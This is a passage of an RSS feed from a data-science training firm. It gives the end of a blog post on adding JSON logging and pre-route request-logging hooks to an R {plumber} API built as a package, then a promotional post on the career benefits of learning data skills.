&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# formatter and convert back to a list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(msg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sapply&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; msg, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# reformat the output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toJSON&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(json[fields], data), auto_unbox &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, generator &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;deparse&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;match.call&lt;/span&gt;()))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice now how data in the log request is a top level field of the JSON, rather than
stringified under msg.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_layout&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_json_custom&lt;/span&gt;(fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;level&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;1&amp;#34;:&amp;#34;foo&amp;#34;,&amp;#34;y&amp;#34;:&amp;#34;bar&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(request &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;meaning of life&amp;#34;&lt;/span&gt;, response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; z)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;request&amp;#34;:&amp;#34;meaning of life&amp;#34;,&amp;#34;response&amp;#34;:42}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="a-setup-function-then"&gt;A setup function then&lt;/h3&gt;
&lt;p&gt;Following on from all of the above we could add a function to our API as a package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; Set up default logger&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; Creates a rotating file log using json format, see&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; \link[logger]{appender_file} for details.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @param dir directory path for logs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @export&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;setup_logger &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;./API_logs&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dir.exists&lt;/span&gt;(dir)) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dir.create&lt;/span&gt;(dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;normalizePath&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;path.expand&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(dir, &lt;span style="color:#a5d6ff"&gt;&amp;#34;log&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_formatter&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;formatter_json)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_layout&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_json_custom&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;time&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;level&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ns&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ns_pkg_version&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;r_version&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_appender&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;appender_tee&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f, max_lines &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2000L&lt;/span&gt;, max_files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20L&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We would then just stick a call to &lt;code&gt;setup_logger()&lt;/code&gt; at the top of our entrypoint script for running
the API.&lt;/p&gt;
&lt;h2 id="automatic-logging-with-hooks"&gt;Automatic logging with hooks&lt;/h2&gt;
&lt;p&gt;We can leverage &lt;a href="https://www.rplumber.io/reference/pr_hook.html" rel="external"&gt;{plumber} hooks&lt;/a&gt; to add some automatic logging
at various points in the lifecycle of a request.&lt;/p&gt;
&lt;p&gt;For example, we might be interested in logging all incoming requests and the data sent with it. As a point of note
the data being received by your application for, say, a POST request, is a stream. This means that once it has been read
once you need to set the stream back to the beginning to be able to read again, otherwise subsequent attempts to read
the data (for example when {plumber} passes the request to the function handling a particular endpoint) will return nothing.&lt;/p&gt;
&lt;p&gt;So we write a function to parse data in a request object&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# extract request data from req environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parse_req_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# if POST we will have content_length &amp;gt; 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; ((&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;CONTENT_LENGTH)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.integer&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;CONTENT_LENGTH) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0L&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# rewind first as well, it seems plumber does not rewind the stream&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;rook.input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rewind&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rawToChar&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;rook.input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# rewind the stream before passing it on&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# as req is env (pass by reference)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# we need to do this to ensure the stream is available for&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# internal plumber methods/functions.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;rook.input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rewind&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and a function that will take the place of a hook for the pre-route stage of a request.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pre_route &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req, res) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;parse_req_data&lt;/span&gt;(req)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;REQUEST_METHOD, path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;PATH_INFO,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; origin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;REMOTE_ADDR,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With all that in place we could create a simple function for adding the hooks to our plumber API&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; default hooks for API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; Adds a default set of hooks (currently only&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; pre route) to the API. These hooks will be used for&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; logging interactions with the running api.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @param api a Plumber api object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @return a Plumber api object with added hooks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @export&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;add_default_hooks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(api) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_hooks&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; preroute &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pre_route
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you have been following the series, our entrypoint script would now look like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# updated for base R pipe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;setup_logger&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_default_hooks&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This version of the cookieCutter package can be found at our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-api-as-package-logging" rel="external"&gt;Github blog repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s it for this installment, there are other things you might choose to log automatically in a running application at different stages
of the request lifecycle or indeed in other parts of your code base, but in the interest of keeping this to a manageable length, we will conclude here.
The next installment in this series will look at some of the things we learned about testing {plumber} APIs and their functions within the context of {testthat}
tests in an R package. Stay tuned!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-logging/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The Benefits of Learning Data Skills</title><link>https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/</link><pubDate>Tue, 20 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;It will come as no great surprise that here at Jumping Rivers, we are huge advocates for &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;learning data skills&lt;/a&gt;. There are many benefits to learning at least some basic data skills, even if you don&amp;rsquo;t work explicitly with data.&lt;/p&gt;
&lt;p&gt;We all benefit from some form of data science every day, even if we don&amp;rsquo;t realise it - the weather forecast is based on analysis of the weather patterns in the atmosphere and what that has resulted in previously; the placement of road safety equipment (speed cameras, SLOW signs, etc) is based on analysis of previous accidents; online advertising is based on you as a user - how else would they do this without analysis of your data to find out what to show you?&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-benefits-of-learning-data-skills"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="benefits"&gt;Benefits&lt;/h3&gt;
&lt;p&gt;These are some of the places that we encounter data science in our day to day lives, but how can learning some data skills yourself benefit you in your career?&lt;/p&gt;
&lt;h4 id="informed-decision-making"&gt;Informed decision making&lt;/h4&gt;
&lt;p&gt;Having at least some basic data skills allows you to make more informed decisions, and more quickly - if you can analyse the data yourself, you don&amp;rsquo;t need to have lengthy back-and-forths with someone else, while you try to explain what you need, and they try to match that - you can just do exactly what you want, straight away.&lt;/p&gt;
&lt;h4 id="relevant-marketing"&gt;Relevant marketing&lt;/h4&gt;
&lt;p&gt;Being able to analyse the outcomes of marketing decisions is an incredibly valuable asset for any company. You want to spend your time and money on things that work - if you, as a person in marketing, can analyse the results of your marketing campaigns, you can make real time decisions based on your desired outcomes.&lt;/p&gt;
&lt;h4 id="problem-solving"&gt;Problem solving&lt;/h4&gt;
&lt;p&gt;One of the main skills we gain from data exploration is problem solving - data science consists of solving a whole bunch of problems one after the other, except at the end, instead of having a complete picture, you&amp;rsquo;ll have a deeper knowledge of your business and client needs!&lt;/p&gt;
&lt;h4 id="its-everywhere"&gt;It&amp;rsquo;s everywhere&lt;/h4&gt;
&lt;p&gt;Data science is being utilised by everyone - it doesn&amp;rsquo;t matter what industry you&amp;rsquo;re interested in joining, if you have data skills, someone will be looking for someone like you to take charge of and make sense of their data!&lt;/p&gt;
&lt;h3 id="where-to-start"&gt;Where to start&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;ve read this far, I&amp;rsquo;m sure you&amp;rsquo;re thinking &amp;ldquo;yes, I want to do that!&amp;rdquo; - in which case your next question might well be &amp;ldquo;so, what now?&amp;rdquo;. That&amp;rsquo;s where Jumping Rivers comes in! If you&amp;rsquo;d like to learn more about how we can help start your data journey, &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Our &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt; courses are a great starting point!&lt;/p&gt;
&lt;p&gt;Want to create a dashboard in a hurry? See &lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Introduction to&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Data Exploration with&lt;/a&gt; Tableau. Interested in programming? Then some of our more advanced &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/?date=January+23%2C+2023+-+Online" rel="external"&gt;R&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/?date=January+12%2C+2023+-+Newcastle" rel="external"&gt;Python&lt;/a&gt; courses might be for you! We also have courses on version control with &lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/?date=December+12%2C+2022+-+Online" rel="external"&gt;Git for Me&lt;/a&gt; and
&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/?date=October+10%2C+2022+-+Newcastle" rel="external"&gt;Data visualisation with ggplot2&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Take a look at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;upcoming public courses&lt;/a&gt;, or &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact us&lt;/a&gt; to discuss tailored training for your team, both on-site and online.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/"&gt;original post&lt;/a&gt;
